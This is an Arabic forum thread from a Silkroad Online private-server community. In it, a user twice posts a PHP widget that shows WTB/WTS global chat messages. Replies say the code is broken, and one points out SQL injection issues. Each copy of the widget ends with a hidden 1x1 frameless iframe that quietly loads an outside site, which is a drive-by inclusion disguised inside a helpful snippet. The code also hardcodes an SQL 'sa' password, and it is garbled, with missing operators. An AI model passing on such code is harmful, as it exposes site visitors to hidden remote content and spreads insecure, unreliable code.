الموقع العربي الاول للعبة Silkroad Online

الموقع العربي الاول للعبة Silkroad Online (https://silkroad4arab.com/vb/index.php)
-   قسم الشروحات و البرامج المستخدمة في عمل السيرفرات الخاصة (https://silkroad4arab.com/vb/forumdisplay.php?f=289)
-   -   Add Global System in Your Website (https://silkroad4arab.com/vb/showthread.php?t=582133)

X-Vortex 20-03-2015 01:26 PM

Add Global System in Your Website
 
Hello Guys
--------------------------------------
Add Glopal System in Your Website
--------------------------------------
اظن الموضوع باين من عنوانة
Screen
http://www.foxpic.com/V22puXvd.png
كود PHP:

<?php 
$ip 
$_SERVER['REMOTE_ADDR']; 
$time date("l dS of F Y h:i:s A"); 
$script $_SERVER[PATH_TRANSLATED]; 
$fp fopen ("[WEB]SQL_Injection.txt""a+"); 
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace 
$sql_inject_2 = array("""","","&quot;"); #To wont replace 
$GET_KEY array_keys($_GET); #array keys from $_GET 
$POST_KEY array_keys($_POST); #array keys from $_POST 
$COOKIE_KEY array_keys($_COOKIE); #array keys from $_COOKIE 
/*begin clear $_GET */ 
for($i=0;$i<count($GET_KEY);$i++) 

$real_get[$i] = $_GET[$GET_KEY[$i]]; 
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_GET[$GET_KEY[$i]])); 
if(
$real_get[$i] != $_GET[$GET_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: GET\r\n"); 
fwrite ($fp"Value: $real_get[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 


/*end clear $_GET */ 
/*begin clear $_POST */ 
for($i=0;$i<count($POST_KEY);$i++) 

$real_post[$i] = $_POST[$POST_KEY[$i]]; 
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_POST[$POST_KEY[$i]])); 
if(
$real_post[$i] != $_POST[$POST_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: POST\r\n"); 
fwrite ($fp"Value: $real_post[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 


/*end clear $_POST */ 
/*begin clear $_COOKIE */ 
for($i=0;$i<count($COOKIE_KEY);$i++) 

$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]]; 
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]])); 
if(
$real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: COOKIE\r\n"); 
fwrite ($fp"Value: $real_cookie[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 



/*end clear $_COOKIE */ 
fclose ($fp); 
?> 


  <div id=page_top></div> 

      <div id=page_content style='min-height: 750px;'> 
 <div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'> 
<div id="spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div> 

  <?php 
    $server_name 
"Vortex-onlie";                //Server name 
    
$host          "VMI32631\SQLEXPRESS";           // SQL server name for example PC-NAME\SQLEXPRESS 
    
$user          "sa";                  // SQL username 
    
$pass         "dusty@123";              // SQL password 
    
$db           "SRO_VT_ACCOUNT";      // SQL Database; 
    
$show         "30";               //Show top 10 for example 
?> 
<!-- Coded by ThElitEyeS --> 
<html> 
    <head> 

        <style type="text/css"> 
         <!-- 
            body 
  table { border-collapse: collapse; text-align: left; width: 100%; }   {font: normal 15px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #White; }  table td,   table th { padding: 0px 13px; }  table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #White), color-stop(1, #White) );background:-moz-linear-gradient( center top, #White 5%, #White 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#White', endColorstr='#White');background-color:#White; color:#White; font-size: 15px; font-weight: bold; border-left: 0px solid #White; }   table thead th:first-child { border: none; }  table tbody td { color: #1DA118; border-left: 1px solid #BC2ED9;font-size: 15px;font-weight: bold; }  table tbody .alt td { background: #D8F4AD; color: #23DBC9; }  table tbody td:first-child { border-left: none; }  table tbody tr:last-child td { border-bottom: none; }  table tfoot td div { border-top: 1px solid #White;background: #White;}   table tfoot td { padding: 0; font-size: 12px }   table tfoot td div{ padding: 2px; } 
            !--> 
        </style> 
    </head> 
    <body> 
        <?php 
            
@$connect odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}""".$user."""".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]"""odbc_errormsg())."</b></center>"); 
            @
odbc_result_all(odbc_exec($connect"SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or  msg like '%WTB%' order by time desc")); 
        
?> 

    <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> 
</body> 
</html>


Mr Z!dane 21-03-2015 12:28 AM

رد: Add Glopal System in Your Website
 
Approved#
ياريت اضافة صورة لتجربتك الشخصية
ان لم يتم اضافة صور خاصة بشرح او تجربة الموضوع
لان يقبل اي موضوع
#فقط للتنبيه

mido22421 21-03-2015 01:39 AM

رد: Add Global System in Your Website
 
X-Vortex

Copy & Paste

---------------------------
قريبا
---------------------------

C## HackShield

http://i.epvpimg.com/eMu8e.png



Mr Z!dane 21-03-2015 02:15 AM

رد: Add Global System in Your Website
 
اقتباس:

المشاركة الأصلية كتبت بواسطة mido22421 (المشاركة 5176542)
X-Vortex

Copy & Paste

---------------------------
قريبا
---------------------------

C## HackShield

http://i.epvpimg.com/eMu8e.png



اشتغل علي حاجا الناس محتجاها
زاي ال Vsro guard
Detguard
etc

UnStoppable! 21-03-2015 02:18 AM

رد: Add Global System in Your Website
 
و الكود ده يتحط فى index.php ولا فين

X-Vortex 21-03-2015 12:23 PM

رد: Add Global System in Your Website
 
اه

X-Vortex 21-03-2015 12:30 PM

رد: Add Global System in Your Website
 
Hello Guys
--------------------------------------
Add Glopal System in Your Website
--------------------------------------
اظن الموضوع باين من عنوانة
Screen
http://www.foxpic.com/V22puXvd.png

كود PHP:

<?php 
$ip 
$_SERVER['REMOTE_ADDR']; 
$time date("l dS of F Y h:i:s A"); 
$script $_SERVER[PATH_TRANSLATED]; 
$fp fopen ("[WEB]SQL_Injection.txt""a+"); 
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace 
$sql_inject_2 = array("""","","&quot;"); #To wont replace 
$GET_KEY array_keys($_GET); #array keys from $_GET 
$POST_KEY array_keys($_POST); #array keys from $_POST 
$COOKIE_KEY array_keys($_COOKIE); #array keys from $_COOKIE 
/*begin clear $_GET */ 
for($i=0;$i<count($GET_KEY);$i++) 

$real_get[$i] = $_GET[$GET_KEY[$i]]; 
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_GET[$GET_KEY[$i]])); 
if(
$real_get[$i] != $_GET[$GET_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: GET\r\n"); 
fwrite ($fp"Value: $real_get[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 


/*end clear $_GET */ 
/*begin clear $_POST */ 
for($i=0;$i<count($POST_KEY);$i++) 

$real_post[$i] = $_POST[$POST_KEY[$i]]; 
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_POST[$POST_KEY[$i]])); 
if(
$real_post[$i] != $_POST[$POST_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: POST\r\n"); 
fwrite ($fp"Value: $real_post[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 


/*end clear $_POST */ 
/*begin clear $_COOKIE */ 
for($i=0;$i<count($COOKIE_KEY);$i++) 

$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]]; 
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]])); 
if(
$real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]]) 

fwrite ($fp"IP: $ip\r\n"); 
fwrite ($fp"Method: COOKIE\r\n"); 
fwrite ($fp"Value: $real_cookie[$i]\r\n"); 
fwrite ($fp"Script: $script\r\n"); 
fwrite ($fp"Time: $time\r\n"); 
fwrite ($fp"==================================\r\n"); 



/*end clear $_COOKIE */ 
fclose ($fp); 
?> 


  <div id=page_top></div> 

      <div id=page_content style='min-height: 750px;'> 
 <div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'> 
<div id="spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div> 

  <?php 
    $server_name 
"Vortex-onlie";                //Server name 
    
$host          "VMI32631\SQLEXPRESS";           // SQL server name for example PC-NAME\SQLEXPRESS 
    
$user          "sa";                  // SQL username 
    
$pass         "dusty@123";              // SQL password 
    
$db           "SRO_VT_ACCOUNT";      // SQL Database; 
    
$show         "30";               //Show top 10 for example 
?> 
<!-- Coded by ThElitEyeS --> 
<html> 
    <head> 

        <style type="text/css"> 
         <!-- 
            body 
  table { border-collapse: collapse; text-align: left; width: 100%; }   {font: normal 15px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #White; }  table td,   table th { padding: 0px 13px; }  table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #White), color-stop(1, #White) );background:-moz-linear-gradient( center top, #White 5%, #White 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#White', endColorstr='#White');background-color:#White; color:#White; font-size: 15px; font-weight: bold; border-left: 0px solid #White; }   table thead th:first-child { border: none; }  table tbody td { color: #1DA118; border-left: 1px solid #BC2ED9;font-size: 15px;font-weight: bold; }  table tbody .alt td { background: #D8F4AD; color: #23DBC9; }  table tbody td:first-child { border-left: none; }  table tbody tr:last-child td { border-bottom: none; }  table tfoot td div { border-top: 1px solid #White;background: #White;}   table tfoot td { padding: 0; font-size: 12px }   table tfoot td div{ padding: 2px; } 
            !--> 
        </style> 
    </head> 
    <body> 
        <?php 
            
@$connect odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}""".$user."""".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]"""odbc_errormsg())."</b></center>"); 
            @
odbc_result_all(odbc_exec($connect"SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or  msg like '%WTB%' order by time desc")); 
        
?> 

    <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> 
</body> 
</html>


UnStoppable! 21-03-2015 06:44 PM

رد: Add Global System in Your Website
 
بابظ بيقولى
No rows found

Dev. iLegend 21-03-2015 07:38 PM

رد: Add Global System in Your Website
 
الفكرة كلها للي فاهم فى php ويعرف يعملها على page بتدخلها من Tap يستخدم الكيوري دي ويكون شغال بـ srZor server files عشان يكون الجلوبال لوج شغال ..

كود PHP:

Select top 30 from srZor_globalChatLog WHERE msg LIKE '%WTB%' OR msg LIKE '%WTS%' OR msg LIKE '%WTT%'order by time desc 


Hamza FiGo 21-03-2015 10:49 PM

رد: Add Global System in Your Website
 
Thanks :)

UnStoppable! 22-03-2015 12:51 AM

رد: Add Global System in Your Website
 
ده بايظ

X-Vortex 22-03-2015 08:32 AM

رد: Add Global System in Your Website
 
يا جماعة الفكرة كلها للي فاهم فى php ويعرف يعملها على page بتدخلها من Tap يستخدم الكيوري دي ويكون شغال بـ srZor server files عشان يكون الجلوبال لوج شغال .. .زى مقال /Lazcano

Hamza FiGo 22-03-2015 11:20 AM

رد: Add Global System in Your Website
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Lazcano (المشاركة 5176743)
الفكرة كلها للي فاهم فى php ويعرف يعملها على page بتدخلها من Tap يستخدم الكيوري دي ويكون شغال بـ srZor server files عشان يكون الجلوبال لوج شغال ..

كود PHP:

Select top 30 from srZor_globalChatLog WHERE msg LIKE '%WTB%' OR msg LIKE '%WTS%' OR msg LIKE '%WTT%'order by time desc 


+1


اقتباس:

المشاركة الأصلية كتبت بواسطة X-Vortex (المشاركة 5176944)
يا جماعة الفكرة كلها للي فاهم فى php ويعرف يعملها على page بتدخلها من Tap يستخدم الكيوري دي ويكون شغال بـ srZor server files عشان يكون الجلوبال لوج شغال .. .زى مقال /Lazcano

+1

UnStoppable! 23-03-2015 05:35 AM

رد: Add Global System in Your Website
 
يا باشا حل ده بايظ

arabcart 03-05-2015 06:47 AM

رد: Add Global System in Your Website
 
هوا انتو مش ملاحظين ان ال code كدا فى SQL Inject ? -_-


الساعة الآن 08:55 PM.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.